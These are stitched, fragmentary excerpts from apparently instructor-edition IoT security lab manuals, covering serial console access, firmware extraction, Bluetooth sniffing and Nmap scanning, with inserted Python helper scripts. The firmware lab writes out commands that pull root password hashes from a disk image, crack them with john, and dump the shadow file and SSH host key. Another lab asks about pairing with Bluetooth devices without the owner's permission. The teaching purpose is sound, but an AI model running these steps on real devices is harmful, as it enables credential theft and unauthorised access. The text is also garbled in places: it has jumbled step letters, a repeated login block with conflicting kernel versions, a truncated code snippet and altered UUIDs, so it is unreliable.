monitoring many types of equipment. It is important that security is in place at the forefront when configuring
and positioning these types of devices. The last part of the lab demonstrates how to secure against these
compromises.
The lab makes use of a variant of the RS-232 serial communication standard that has been used since the
1960s to communicate between various types of equipment.
Please note that a special cable is used to connect the Raspberry Pi to the PC serial port.
Even though some PCs still have conventional RS-232 COM ports, it is imperative that the pins of those
ports are not connected directly to the Raspberry Pi. The Raspberry Pi uses +3.3 V on its serial pins,
whereas the RS-232 specification indicates voltages up to +13 V.
There are other possible methods for reducing the voltage; given the header connections on the Raspberry Pi
and many other IoT-type devices, this cable provides the simplest way to accomplish serial connectivity.
Required Resources
Raspberry Pi 3 Model B or later (with PL-App)
8GB Micro SD card (minimum required)
PC with IoTSec Kali VM and terminal emulation software, such as PuTTY
Network connectivity between PC and Raspberry Pi
adafruit - USB TO TTL SERIAL CABLE - DEBUG / CONSOLE CABLE FOR RASPBERRY PI or
compatible cable – adafruit PRODUCT ID: 954 (similar to the one pictured below)
Note: When purchasing a compatible cable, look for those using either the Prolific or SiLabs chipset. Make
certain to read the reviews when purchasing a compatible cable to verify compatibility with the Raspberry Pi.
It is important that the output voltage be +3.3 V.
Cable Wire   Raspberry Pi Pin   Function
Black        6                  Ground
White        8                  Transmit
Green        10                 Receive
Red          -                  Unused
e. After locating the necessary pins, power off the Raspberry Pi until instructed to power it up again.
(pl-app) root@myPi:/home/pi/notebooks# shutdown -h now
f. Unplug the Raspberry Pi from the power source. With the Raspberry Pi turned off, connect the USB to
Serial cable to the pins listed in the above table on the Raspberry Pi.
c. Navigate to the Device Manager to determine the COM port assigned to the USB to Serial connection. In
this example, Prolific USB-to-Serial is using COM3.
d. The following settings will need to be defined for connecting to the Raspberry Pi using the console port.
Description Settings
For example, in the PuTTY Session screen, select the Serial radio button, and verify that the COM port
entered in the Serial line box matches the COM port determined in Device Manager and that the correct
baud rate is specified.
Expand Connection and click Serial to verify that all the options are configured according to the above table.
Click Open to start the terminal session to the Raspberry Pi. PuTTY will wait for output from the
Raspberry Pi or input from the keyboard.
e. Power up the Raspberry Pi. Output from the Raspberry Pi should start scrolling across the screen as
shown below.
[ 0.000000] Booting Linux on physical CPU 0x0
[ 0.000000] Linux version 4.14.30+ (dc4@dc4-XPS13-9333) (gcc version 4.9.3
(crosstool-NG crosstool-ng-1.22.0-88-g8460611)) #1102 Mon Mar 26 16:20:05 BST 2018
IP: 203.0.113.11
myPi login:
What version and type of operating system is displayed in the output?
____________________________________________________________________________________
Linux version 4.14.30+
What type of processor is being used?
____________________________________________________________________________________
CPU: ARMv7 Processor +
f. Log in using the credentials for the user pi configured for your Raspberry Pi in a previous lab.
IP: 203.0.113.11
myPi login:
What version and type of operating system is displayed in the output?
____________________________________________________________________________________
Linux version 3.18.11-v7+
import time
import serial

# Open the Raspberry Pi UART (/dev/serial0) with the settings the Raspberry Pi
# serial console uses: 115200 baud, 8 data bits, no parity, 1 stop bit (8N1).
ser = serial.Serial(
    port='/dev/serial0',
    baudrate=115200,
    parity=serial.PARITY_NONE,
    stopbits=serial.STOPBITS_ONE,
    bytesize=serial.EIGHTBITS,
    timeout=1          # read timeout in seconds
)
counter = 0
Reflection
1. Knowing what you know so far, do you think it would be possible to connect two Raspberry Pi devices
together using the serial pins? If so, how?
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________
It would be very easy to do. Simply use a jumper wire to connect the Tx pin on Raspberry Pi #1 to the Rx pin
on Raspberry Pi #2 and the Rx pin on Raspberry Pi #1 to the Tx pin on Raspberry Pi #2. Because both
devices use +3.3 V, no other conversion would be necessary. Both Raspberry Pi devices could
have their serial ports disabled for login and the terminal emulation software set to the same baud rate in
order to communicate. It may be necessary to download the 'screen' application using 'apt-get install screen'
on the Raspberry Pi. It would also be possible to leave the serial login enabled on Raspberry Pi #1 and
connect to Raspberry Pi #2 using the 'screen' application and log in.
2. What kind of information might you need to know in order to capture the data coming out of the serial port of
an IoT device?
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________
In order to capture data, it would be necessary to know the baud rate, stop bits, parity, and flow control
settings on the IoT device. The baud rate could be determined through trial and error using the common baud
rates (i.e., 2400, 4800, 9600, 19200, ... 115200).
Lab – Compromise IoT Device Firmware (Instructor Version)
Instructor Note: Red font color or gray highlights indicate text that appears in the instructor copy only.
Objectives
Part 1: Performing Threat Modeling Activities to Evaluate IoT Device Firmware
Part 2: Reflection and Discussion of Threats to IoT Device Firmware
Background / Scenario
IoT devices are susceptible to attacks like many other Internet connected devices running an operating
system. In the past, hackers have taken over smart home devices including security cameras, refrigerators,
ovens, air conditioners, and even vehicles while they were driving. IoT devices with cameras can potentially
be used as spying devices within one’s home. Many popular IoT devices run Linux as their OS.
Vulnerabilities with device firmware include, but are not limited to: key handling vulnerabilities, hard coded
passwords, default username/passwords, clear text password transmission through WiFi, buffer overflow
attacks, distributed denial of service attacks, and firmware modification attacks.
This lab will require students to download a device firmware binary file and decompress/decode it to its file
system and kernel components. Students will be required to analyze the firmware and investigate how
vulnerabilities can be exploited.
In this particular lab, we will be exploring an IoT device’s firmware file by using a wide variety of
tools/commands on a Kali Linux virtual image.
Required Resources
Laptop or PC running Oracle Virtual Box with a virtual image of Kali Linux loaded
Internet connection
Note: If the Kali Linux machine has not been installed, please refer to a previous lab in this course.
b. Open up a terminal window.
Note: The Linux prompts in the examples of this lab have been shortened to just #, indicating that you
have root access.
# pwd
# cd /root/lab_support_files/emulated/mips32
# strings rootfs.ext2 | grep root:\\$ > /tmp/passwd
# more /tmp/passwd
b. Run john on the file /tmp/passwd to crack the password.
# john /tmp/passwd
Created directory: /root/.john
Warning: detected hash type "md5crypt", but the string is also recognized as "aix-smd5"
Use the "--format=aix-smd5" option to force loading these as that type instead
<some output omitted>
Use the "--show" option to display all of the cracked passwords reliably
Session completed
You could also use the show option to display the cracked passwords.
# john --show /tmp/passwd
What is the root password? ________________________________________________________ device
Step 3: Extract the IoT device firmware binary file into a new directory.
a. Change directories to the IoT device firmware file:
# cd /root/lab_support_files/firmware
b. List the content of the folder and obtain the name of the firmware file:
# ls -l
c. The following command will extract the file system from the firmware and will allow you to navigate and
explore anything that can be targeted as a potential vulnerability:
# binwalk -e iotdev_firmware.bin
What is the file system type? _____________________________________________________ squashfs
What is the name of the new directory within this subdirectory? What command did you use to determine
that?
____________________________________________________________________________________
____________________________________________________________________________________
squashfs-root, ls -l
Step 6: Use the QEMU open source machine emulator and virtualizer
QEMU will allow you to emulate binaries for other architectures different from what your Kali Linux image is
currently running on. QEMU supports the MIPS architecture.
All of the binaries in the squashfs-root directory that were decompiled/decompressed from the IoT device’s
firmware file were compiled for the MIPS architecture. They will not run on this Kali Virtual Image because it is
on a different architecture. In order to run these binaries, we will need to use QEMU.
Instructor Note: QEMU should already be installed on the Kali Linux virtual image.
a. The QEMU binary that we will be using needs to be copied to the squashfs-root directory. Before we
copy it, we need to know where it is located:
# which qemu-mips-static
Where is this binary file located? _________________________________________________________
/usr/bin/qemu-mips-static
b. Copy this file to the current working directory, which should be squashfs-root:
# cp /usr/bin/qemu-mips-static .
c. Try running bin/busybox and other binaries without QEMU and notice that they will not be successful:
# bin/busybox
# bin/ping 127.0.0.1
These commands did not work because the QEMU emulator is required to run binaries originally compiled for
a different architecture.
d. The following uses the chroot command. The chroot command changes the root directory to the current
directory, as identified with the . (dot).
Enter the commands below to demonstrate that we can run MIPS binaries on the Kali Linux OS:
# chroot . ./qemu-mips-static bin/busybox date
# chroot . ./qemu-mips-static bin/ping -c 3 127.0.0.1
e. Start a new shell within the squashfs-root directory with the following command:
# chroot . ./qemu-mips-static bin/sh
How did the prompt change? ____________________________________________________________
It is now displaying the path as ‘/’ followed by the # for the root prompt
f. Verify that new shell is using the current path as the root directory.
# pwd
What is the current path? ______________________________________________________________ /
Look at other programs/binaries in the bin and sbin directories. Try running at least 3 other programs and
document their results. Type ‘exit’ when you have completed exploration to leave the shell.
____________________________________________________________________________________
____________________________________________________________________________________
____________________________________________________________________________________
Answers will vary.
Step 7: Explore and look at other important files on this decompiled/extracted file
system
a. Verify you are currently within the squashfs-root directory:
# pwd
b. Use the following commands to explore and look for possible vulnerabilities:
# ls -l usr
# ls -l usr/bin
# ls -l bin/
# ls -l usr/sbin
# ls -l etc/
# cat etc/passwd
# cat etc/shadow
# cat etc/ssh/ssh_host_rsa_key
c. What other commands did you use to explore and look for possible vulnerabilities?
____________________________________________________________________________________
____________________________________________________________________________________
____________________________________________________________________________________
Answers will vary. Example: The mount command could allow access to other filesystems and import
malicious files or export files, such as /etc/shadow.
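As an added example (not part of the lab), this Python script automates the check behind the root-hash extraction in Step 2 and the etc/passwd and etc/shadow inspection in Step 7: it classifies each account's password field by hash scheme and reports accounts that are password-less, use legacy DES crypt, or use md5crypt ($1$), the hash type john cracked here. The sample entries and hash strings are constructed placeholders.

```python
"""Audit passwd/shadow-style entries recovered from a firmware image.

Added example, not part of the lab. Each account's password field is
classified by hash scheme; empty fields, legacy DES and md5crypt ($1$)
are reported as weak. The sample entries below are constructed.
"""
import re

# Constructed sample in the format produced by "strings rootfs.ext2 | grep root:\$"
# and "cat etc/shadow". The hash strings are placeholders, not real hashes.
SAMPLE_SHADOW = """\
root:$1$aBcDeFgH$PLACEHOLDERmd5crypthash:17000:0:99999:7:::
admin::17000:0:99999:7:::
daemon:*:17000:0:99999:7:::
nobody:!:17000:0:99999:7:::
www:$6$saltsalt$PLACEHOLDERsha512crypthash:17000:0:99999:7:::
support:AbCdEfGhIjKlM:17000:0:99999:7:::
"""

# Hash prefix -> (scheme name, considered weak for a shipped firmware image?)
SCHEMES = {
    "$1$": ("md5crypt", True),
    "$5$": ("sha256crypt", False),
    "$6$": ("sha512crypt", False),
    "$y$": ("yescrypt", False),
    "$2a$": ("bcrypt", False),
    "$2b$": ("bcrypt", False),
    "$2y$": ("bcrypt", False),
}
DES_RE = re.compile(r"^[./0-9A-Za-z]{13}$")   # traditional 13-char DES crypt


def classify(pw_field):
    """Return (scheme, weak) for one password field."""
    if pw_field == "":
        return ("empty", True)           # login requires no password at all
    if pw_field == "*" or pw_field.startswith("!"):
        return ("locked", False)         # no password login possible
    for prefix, (name, weak) in SCHEMES.items():
        if pw_field.startswith(prefix):
            return (name, weak)
    if DES_RE.match(pw_field):
        return ("des", True)
    return ("unknown", True)             # unrecognised: report for review


def audit(text):
    """Parse passwd/shadow lines and return {user: (scheme, weak)}."""
    results = {}
    for line in text.splitlines():
        fields = line.split(":")
        if len(fields) < 2 or not fields[0]:
            continue                     # skip blank or malformed lines
        results[fields[0]] = classify(fields[1])
    return results


def weak_accounts(text):
    """Sorted usernames whose password field should be reported."""
    return sorted(user for user, (_, weak) in audit(text).items() if weak)
```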
Reflection
1. What kinds of threats or vulnerabilities are IoT device firmware susceptible to?
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________
IoT devices might be vulnerable to attacks such as Buffer Overflow attacks, DoS attacks, firmware
modification, distributed denial of service, and key handling vulnerabilities.
2. Describe one type of IoT device firmware attack and what measures could be used to help prevent this type
of attack.
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________
A backdoor could be added to an existing script within the device firmware. If a hacker repackages the
firmware into a new downloadable binary file, an unsuspecting user could potentially install this infected
firmware on their IoT device. A hash could be used to verify that firmware binary files have not been modified.
3. Describe another type of IoT device firmware attack and what measures could be used to help prevent this
type of attack.
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________
IoT devices with default usernames could be logged into remotely. Fix includes: changing the default
username/passwords.
In addition: Passwords can be cracked or modified, and certificates can be modified.
4. What is the name of the program that hackers could use to modify firmware with a backdoor and repackage it
back into another firmware binary? Does this program exist on the Kali Linux operating system that you are
using? Hint: Use Google to find the answer.
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________
firmware-mod-kit
Yes.
Lab - Sniffing Bluetooth with the Raspberry Pi (Instructor Version)
Instructor Note: Red font color or gray highlights indicate text that appears in the instructor copy only.
Topology
Objectives
In this lab, students will become familiar with varying levels of security on different common devices that use
Bluetooth/BLE (Bluetooth Low Energy). Students will configure a Raspberry Pi to detect and display
information about the Bluetooth devices that are in its range. This is an awareness building lab that will help
students understand the nature of wireless hacking processes and requirements and take on a “hacker
mindset” to think like a “white hat” to help secure IoT Security devices.
Part 1: Configuring the Raspberry Pi as a Bluetooth Sniffer
Part 2: Using the CLI to Detect and Display Information about Bluetooth Device
Part 3: Using the CLI to Pair with a Sniffed Device
Background/Scenario
Bluetooth offers several benefits and advantages. Bluetooth also has risks.
Bluetooth technology and associated devices are susceptible to general wireless networking threats, such as
denial of service attacks and man-in-the-middle (MITM) attacks. MITM attacks occur when threat actors
position themselves between the source and destination and intercept the communications. Some Bluetooth
devices are designed to broadcast their MAC address, universally unique identifier (UUID) and service information at a
predefined interval. Because of this continuous advertisement, hackers can easily track the device and decode the
broadcast information using a sniffer. This lab requires that the target Bluetooth devices are locatable by
the Raspberry Pi. These could be phones, laptops, personal fitness devices, and others.
Note: The labs in this course assume that the student has all of the necessary hardware to perform them. If
you do not have the necessary hardware and wish to complete these labs, you may wish to purchase kits
which contain all of the hardware for the challenge labs and additional hardware, which can be used to
complete additional experiments beyond this course. Make sure to read the required resources for each
challenge lab to understand what hardware is required.
Instructor Note: Using a sniffer may be considered a breach of the security policy of the school. It is
recommended that permission be obtained before running this lab. If using a sniffer is an issue, the instructor
may wish to assign the lab as homework.
Required Resources
• Raspberry Pi 3 Model B or later (with PL-App)
• 8GB Micro SD card (minimum required)
• PC with IoTSec Kali VM
• Network connectivity between PC and Raspberry Pi
• Bluetooth devices (PC, Smartphone, Smartband, Bluetooth LED Control…)
Step 2: Verify and activate the Bluetooth interface/services on the Raspberry Pi.
a. Within the PL-App, open a terminal window and enter the rfkill list command to check if the Bluetooth
interface is blocked by software:
(pl-app) root@pi:/home/pi/notebooks# rfkill list
0: phy0: Wireless LAN
Soft blocked: no
Hard blocked: no
1: hci0: Bluetooth
Soft blocked: no
Hard blocked: no
b. If the Bluetooth Interface hci0 is blocked, use the command rfkill unblock bluetooth to unlock it.
c. Use the systemctl status bluetooth.service command to show the status of the Bluetooth service.
(pl-app) root@pi:/home/pi/notebooks# systemctl status bluetooth.service
● bluetooth.service - Bluetooth service
Loaded: loaded (/lib/systemd/system/bluetooth.service; enabled; vendor
preset: enabled)
Active: active (running) since Tue 2018-05-22 00:00:02 UTC; 10h ago
Docs: man:bluetoothd(8)
Main PID: 522 (bluetoothd)
Status: "Running"
CGroup: /system.slice/bluetooth.service
└─522 /usr/lib/bluetooth/bluetoothd
<output omitted>
d. If the Bluetooth service status is not “active (running)”, use the command systemctl start
bluetooth.service to start it.
(pl-app) root@pi:/home/pi/notebooks# systemctl start bluetooth.service
e. Use the hciconfig hci0 command to display the status of the Bluetooth interface.
(pl-app) root@pi:/home/pi/notebooks# hciconfig hci0
hci0: Type: Primary Bus: UART
BD Address: B8:27:EB:72:CC:11 ACL MTU: 1021:8 SCO MTU: 64:1
UP RUNNING
RX bytes:6770 acl:46 sco:0 events:230 errors:0
TX bytes:3819 acl:46 sco:0 commands:90 errors:0
f. If the hci0 interface status is down, use the command hciconfig hci0 up to activate it.
(pl-app) root@pi:/home/pi/notebooks# hciconfig hci0 up
Part 2: Using the CLI to Detect and Display Information about Bluetooth
Devices
a. From the command line, use the bluetoothctl command to launch the Bluetooth tool. The prompt will
change to [bluetooth]#. The tool will display some information about the Bluetooth
controller of your Raspberry Pi and probably some information about Bluetooth devices that are connected or
available for pairing:
(pl-app) root@pi:/home/pi/notebooks# bluetoothctl
[NEW] Controller B8:27:EB:72:CC:11 raspberrypi [default]
[bluetooth]#
b. Enter the scan on command to start searching for nearby Bluetooth devices and scan off to stop it. You
should see the MAC addresses and sometimes the device name of all Bluetooth devices discovered by
the Raspberry Pi:
[bluetooth]# scan on
Discovery started
[CHG] Controller B8:27:EB:72:CC:11 Discovering: yes
[NEW] Device A4:C1:38:CC:F5:42 Triones-A4C138CCF542
[NEW] Device DA:B6:4A:F2:A8:BA Band
[NEW] Device 28:98:7B:E1:CE:D8 GT-S700
[bluetooth]# scan off
Take note of the MAC address (and if available the name) of some discovered Bluetooth devices:
____________________________________________________________________________________
Answers will vary.
c. Use the info command followed by the MAC address of a discovered device to obtain detailed
information about the device:
[bluetooth]# info DA:B6:4A:F2:A8:BA
Device DA:B6:4A:F2:A8:BA
Name: Band
Alias: Band
Paired: no
Trusted: no
Blocked: no
Connected: no
LegacyPairing: no
UUID: Anhui Huami Information.. (0000fee0-0000-1000-8000-00805f9b34fb)
ManufacturerData Key: 0x0157
Take note of the information displayed and perform a web search for the meaning of some fields
displayed and report below a summary of the main information displayed.
____________________________________________________________________________________
____________________________________________________________________________________
____________________________________________________________________________________
____________________________________________________________________________________
____________________________________________________________________________________
____________________________________________________________________________________
____________________________________________________________________________________
____________________________________________________________________________________
The output for DA:B6:4A:F2:A8:BA is a smartband. The UUID usually represents some common service
(protocol) that the discovered Bluetooth device supports.
Additional Example 1: This output is related to a GT-S7500 Smartphone.
[bluetooth]# info 28:98:7B:E1:CE:D8
Device 28:98:7B:E1:CE:D8
Name: GT-S7500
Alias: GT-S7500
Class: 0x58020c
Icon: phone
Paired: no
Trusted: no
Blocked: no
Connected: no
LegacyPairing: no
UUID: Audio Source (0000110a-0000-1000-8000-00805f9b32fb)
UUID: A/V Remote Control Target (0000110c-0000-1000-8000-00805f9b32fb)
UUID: Handsfree Audio Gateway (0000111f-0000-1000-8000-00805f9b32fb)
UUID: Headset AG (00001112-0000-1000-8000-00805f9b32fb)
UUID: OBEX Object Push (00001105-0000-1000-8000-00805f9b32fb)
UUID: Phonebook Access Server (0000112f-0000-1000-8000-00805f9b32fb)
[bluetooth]#
Additional Example 2: This output is related to a LED Bluetooth controller.
[bluetooth]# info A4:C1:38:CC:F5:42
Device A4:C1:38:CC:F5:42
Name: Triones-A4C138CCF542
Alias: Triones-A4C138CCF542
Paired: no
Trusted: no
Blocked: no
Connected: no
Legacy Pairing: no
UUID: Unknown (0000ffd0-0000-1000-8000-00805f9b34fb)
UUID: Unknown (0000ffd5-0000-1000-8000-00805f9b34fb)
[bluetooth]#
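As an added example (this is not part of the lab and not bluetoothctl's own code), the following Python script parses an info transcript like the ones above and reports what a defender should note about a discovered device: whether it is paired, trusted or still uses legacy PIN pairing, which Bluetooth SIG-assigned services it advertises, and how many vendor-specific 128-bit UUIDs it exposes. A 16-bit assigned number XXXX always appears as 0000XXXX-0000-1000-8000-00805f9b34fb, so the script recovers it from that pattern; the service-name table covers only the UUIDs that appear on this page. The sample transcript is constructed for the example (one made-up vendor UUID is included) rather than captured from a real device.

```python
import re

# Bluetooth SIG base UUID: a 16-bit assigned number XXXX appears as
# 0000XXXX-0000-1000-8000-00805f9b34fb. Anything else is a custom 128-bit UUID.
BT_BASE_SUFFIX = "-0000-1000-8000-00805f9b34fb"

# 16-bit service UUIDs named in the bluetoothctl output shown in this lab.
KNOWN_SERVICES = {
    0x1105: "OBEX Object Push",
    0x110A: "Audio Source",
    0x110C: "A/V Remote Control Target",
    0x1112: "Headset AG",
    0x111F: "Handsfree Audio Gateway",
    0x112F: "Phonebook Access Server",
    0xFEE0: "Anhui Huami Information (member-assigned)",
}

_UUID_LINE = re.compile(r"UUID:\s+(.*?)\s+\(([0-9a-fA-F-]{36})\)$")

# Constructed sample transcript in the format bluetoothctl prints (not a real capture).
SAMPLE_INFO = """\
[bluetooth]# info 28:98:7B:E1:CE:D8
Device 28:98:7B:E1:CE:D8
Name: GT-S7500
Alias: GT-S7500
Class: 0x58020c
Icon: phone
Paired: no
Trusted: no
Blocked: no
Connected: no
LegacyPairing: no
UUID: Audio Source (0000110a-0000-1000-8000-00805f9b34fb)
UUID: Handsfree Audio Gateway (0000111f-0000-1000-8000-00805f9b34fb)
UUID: OBEX Object Push (00001105-0000-1000-8000-00805f9b34fb)
UUID: Vendor specific (12345678-1234-5678-1234-56789abcdef0)
[bluetooth]#
"""


def short_uuid(uuid128):
    """Return the 16-bit assigned number if the UUID uses the SIG base, else None."""
    u = uuid128.lower()
    if len(u) == 36 and u.startswith("0000") and u.endswith(BT_BASE_SUFFIX):
        return int(u[4:8], 16)
    return None


def parse_info(text):
    """Parse one 'info <addr>' transcript into address, fields and UUID list."""
    dev = {"address": None, "fields": {}, "uuids": []}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("[bluetooth]#"):
            continue                       # prompt or echoed command
        if line.startswith("Device "):
            dev["address"] = line.split()[1]
            continue
        m = _UUID_LINE.match(line)
        if m:
            label, u = m.group(1), m.group(2).lower()
            s = short_uuid(u)
            dev["uuids"].append({"label": label, "uuid": u, "short": s,
                                 "service": KNOWN_SERVICES.get(s)})
            continue
        key, sep, val = line.partition(":")
        if sep:
            key = key.replace(" ", "")     # "Legacy Pairing" and "LegacyPairing" both occur
            val = val.strip()
            dev["fields"][key] = {"yes": True, "no": False}.get(val, val)
    return dev


def describe(dev):
    """Summarise the security-relevant parts of a parsed device record."""
    f = dev["fields"]
    sig = [u for u in dev["uuids"] if u["short"] is not None]
    custom = [u for u in dev["uuids"] if u["short"] is None]
    return [
        "%s (%s)" % (dev["address"], f.get("Name", "no name")),
        "paired=%s trusted=%s connected=%s legacy_pairing=%s" % (
            f.get("Paired"), f.get("Trusted"), f.get("Connected"), f.get("LegacyPairing")),
        "SIG services: " + ", ".join(u["service"] or "0x%04x" % u["short"] for u in sig),
        "custom/vendor UUIDs: %d" % len(custom),
    ]


if __name__ == "__main__":
    for note in describe(parse_info(SAMPLE_INFO)):
        print(note)
```

Legacy pairing and a long list of profiles (OBEX push, phonebook access) are the fields worth recording in an inventory; vendor-specific UUIDs usually mark proprietary protocols that deserve a closer look.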
Connection successful
[CHG] Device CA:4C:FB:5E:00:BA ServicesResolved: yes
[K800BA]#
Are you able to connect (without permission from the owner) to some Bluetooth devices? Write your
findings below:
____________________________________________________________________________________
____________________________________________________________________________________
____________________________________________________________________________________
____________________________________________________________________________________
____________________________________________________________________________________
____________________________________________________________________________________
____________________________________________________________________________________
Answers will vary. You may not be able to connect, without the authorization of the owner, to Bluetooth
devices that implement a high level of security. The Raspberry Pi can be connected to a Bluetooth device
without a PIN. Further operations may be possible after pairing with the device. Note that the success and
output of the command depend on the Bluetooth version and Bluetooth security mode of the target device.
For example, Bluetooth devices that use Security Mode 1 are inherently insecure.
e. Enter quit to exit the Bluetooth tool.
[bluetooth]# quit
Part 4: Clean Up
a. Enter systemctl stop bluetooth.service to disable the Bluetooth service.
(pl-app) root@Pi-3:/home/pi/notebooks# systemctl stop bluetooth.service
b. Verify that the Bluetooth service has been disabled with the systemctl status bluetooth.service
command.
(pl-app) root@Pi-3:/home/pi/notebooks# systemctl status bluetooth.service
● bluetooth.service - Bluetooth service
Loaded: loaded (/lib/systemd/system/bluetooth.service; enabled; vendor preset: enabled)
Active: inactive (dead) since Tue 2018-11-27 21:47:30 UTC; 1min 10s ago
Docs: man:bluetoothd(8)
Process: 843 ExecStart=/usr/lib/bluetooth/bluetoothd (code=exited, status=0/SUCCESS)
Main PID: 843 (code=exited, status=0/SUCCESS)
Status: "Quitting"
<output omitted>
Lab - Port Scanning an IoT Device (Instructor Version)
Instructor Note: Red font color or gray highlights indicate text that appears in the instructor copy only.
Topology
Objectives
Part 1: Perform a Nmap network discovery scan
Part 2: Compare a Nmap TCP default port scan and full scan
Part 3: Perform a Nmap UDP Scan
Part 4: Perform Nmap OS and Service Foot Printing
Background / Scenario
Nmap, or “Network mapper,” is a free and open source network port scanner. It can be used to test IoT
devices and firewalls for open, closed, or filtered ports and additionally can provide an inventory of devices
and services available on a network. Nmap uses the TCP header flag fields URG, ACK, PSH, RST, SYN,
FIN, shown in the diagram, to accomplish its scans. It also uses other protocols such as UDP, ICMP and a
built-in database of known OS and application signatures. Nmap is included with Kali, but can also be
downloaded from https://nmap.org/. A comprehensive reference about how Nmap works and how it is used is
available at the Nmap website.
Required Resources
• Raspberry Pi 3 Model B or later
• 8GB Micro SD card (minimum required)
• PC with IoTSec Kali VM
• Network connectivity between PC and Raspberry Pi
Refer to the man page and complete the table below. There are many other resources available online to
help you learn Nmap.
Option   Meaning         Description
-sn      No port scan    Nmap will do a host discovery scan, but will not do the normal port scan.
f. Perform a scan on your network by specifying the network address and bit mask.
root@kali:~# nmap 203.0.113.0/24
What is the IP address of the Raspberry Pi?
____________________________________________________________________________________
Answers will vary. The assigned IP address will be in the network of 203.0.113.0/24.
g. Sometimes a device does not reply to Nmap’s initial network discovery scan because of a firewall, an
IDS/IPS system, or similar. Instead of relying on the initial scan to discover hosts that are alive for further
scanning, we can tell Nmap to skip host discovery and scan the network assuming all hosts are alive.
root@kali:~# nmap -Pn 203.0.113.0/24
What is the IP address and MAC address of your Raspberry Pi?
____________________________________________________________________________________
____________________________________________________________________________________
Answers will vary.
This will allow us to see the UDP traffic generated by Nmap to the Raspberry Pi. Notice in the UDP
header above that there are no flags. Nmap can only send UDP packets and wait for a possible “port
unreachable” (destination unreachable) message, which means the port is closed.
c. In the Kali VM terminal, enter the command nmap with -sU option scanning the IP address of your
Raspberry Pi.
root@kali:~# nmap -sU -F 203.0.113.13
d. It will take a few minutes, but look at the Wireshark capture. As you scroll down the packets, you will see
some “Destination unreachable” on different ports indicating the port is closed.
How many UDP ports are there? How many UDP ports does Nmap scan, by default? (Use web search as
necessary.)
____________________________________________________________________________________
There are 65,535 UDP ports. Nmap scans only the most commonly used 1,000.
What are the UDP ports that are open from the scan? What protocols use these UDP ports?
____________________________________________________________________________________
____________________________________________________________________________________
Answers may vary. Ports 68 and 5353 are most likely. BOOTP and Multicast DNS use these ports.
These services are used by PL-App.
What is the meaning of the -F option? Try the same scan without the -F. What is the difference?
____________________________________________________________________________________
____________________________________________________________________________________
The -F option stands for fast. Only the most common 100 ports are scanned. This makes the scan much
faster.
e. Stop the Wireshark capture when finished and clear the filter.
Look at the packets in Wireshark. What protocols were used to determine the OS?
____________________________________________________________________________________
____________________________________________________________________________________
Answers may vary. TCP, UDP, & ICMP
d. We can sometimes identify a device by looking at the time to live (TTL) field of a local ping response,
which varies by device OS. See the table below:
OS        Default TTL
Cisco     255
Windows   128
Linux     64
In the Kali VM terminal, enter the command to ping your Raspberry Pi with 4 ICMP packets.
root@kali:~# ping -c4 203.0.113.13
What is the TTL in the response? Is it consistent with the Nmap identification?
____________________________________________________________________________________
____________________________________________________________________________________
The TTL in the response is 64, which is consistent with a Linux OS.
e. Stop the Wireshark capture when finished.
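The TTL reasoning above, written out as an added Python example (not part of the lab). It reads the ttl= values out of ping output, picks the smallest common initial TTL that is at least the observed value, and reports the implied OS family and hop count; the table of initial TTLs is the lab's (64/128/255) and is an assumption, since administrators can change the default. The ping output below is constructed for the example, not a real capture.

```python
import re

# Default initial TTLs from the lab table (assumption: stock defaults; admins can change them).
INITIAL_TTLS = {64: "Linux (and most Unix-like systems)",
                128: "Windows",
                255: "Cisco IOS / network devices"}

_TTL_RE = re.compile(r"\bttl=(\d+)", re.IGNORECASE)

# Constructed sample of `ping -c4` output (not a real capture).
SAMPLE_PING = """\
PING 203.0.113.13 (203.0.113.13) 56(84) bytes of data.
64 bytes from 203.0.113.13: icmp_seq=1 ttl=64 time=0.512 ms
64 bytes from 203.0.113.13: icmp_seq=2 ttl=64 time=0.488 ms
64 bytes from 203.0.113.13: icmp_seq=3 ttl=64 time=0.501 ms
64 bytes from 203.0.113.13: icmp_seq=4 ttl=64 time=0.495 ms
"""


def parse_ping_ttls(ping_output):
    """Extract the TTL of every reply line in ping output."""
    return [int(m.group(1)) for m in _TTL_RE.finditer(ping_output)]


def guess_os_from_ttl(observed_ttl):
    """Assume the smallest common initial TTL >= observed; the difference is the hop count.
    A TTL of 64 could also be a Windows host 64 hops away, so the guess must be checked
    against Nmap's OS detection rather than trusted on its own."""
    if not 1 <= observed_ttl <= 255:
        raise ValueError("TTL must be 1..255")
    for initial in sorted(INITIAL_TTLS):
        if observed_ttl <= initial:
            return {"observed_ttl": observed_ttl, "initial_ttl": initial,
                    "hops": initial - observed_ttl, "os_family": INITIAL_TTLS[initial]}


def fingerprint_from_ping(ping_output):
    """Combine the replies: use the most frequent TTL and flag runs where replies disagree."""
    ttls = parse_ping_ttls(ping_output)
    if not ttls:
        return None
    guess = guess_os_from_ttl(max(set(ttls), key=ttls.count))
    guess["consistent"] = len(set(ttls)) == 1   # False means routing changed mid-run
    return guess


if __name__ == "__main__":
    print(fingerprint_from_ping(SAMPLE_PING))
```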
Port   Service version
22     SSH-2.0-OpenSSH_7.4p1
80     Tornado httpd 4.5.1
88     nginx 1.10.3
89     Node.js Express framework
What is different in the port identification from the Nmap TCP scan in Part 2 of the lab and this application
service scan? What implications does this have for IoT security?
____________________________________________________________________________________
____________________________________________________________________________________
In the normal TCP scan, only protocols are identified. In this scan, details about the running services are
also shown. These details can be used to identify versions of software services that have well-known
vulnerabilities.
What additional functions does this scan also perform?
____________________________________________________________________________________
____________________________________________________________________________________
Nmap also performs a traceroute and OS detection, and reports SSH details.
c. Stop the Wireshark capture when finished.
Lab - Packet Crafting to Exploit Unsecured Ports (Instructor Version)
Instructor Note: Red font color or gray highlights indicate text that appears in the instructor copy only.
Topology
Objectives
Part 1: Using hping3 for Port Scanning
Part 2: Crafting Different Types of ICMP Messages
Part 3: Launching DoS Attacks
Background / Scenario
hping3 is a tool used to send custom-crafted TCP/IP packets to a network target in order to elicit a response.
Many values in IP packets and TCP headers can be specified in hping3 and the resulting packets sent out on
the network. Like Nmap, hping3 can use the TCP header flag fields URG, ACK, PSH, RST, SYN, and FIN to
accomplish its scans. It can also craft packets with other protocols such as UDP and ICMP. Unlike Nmap,
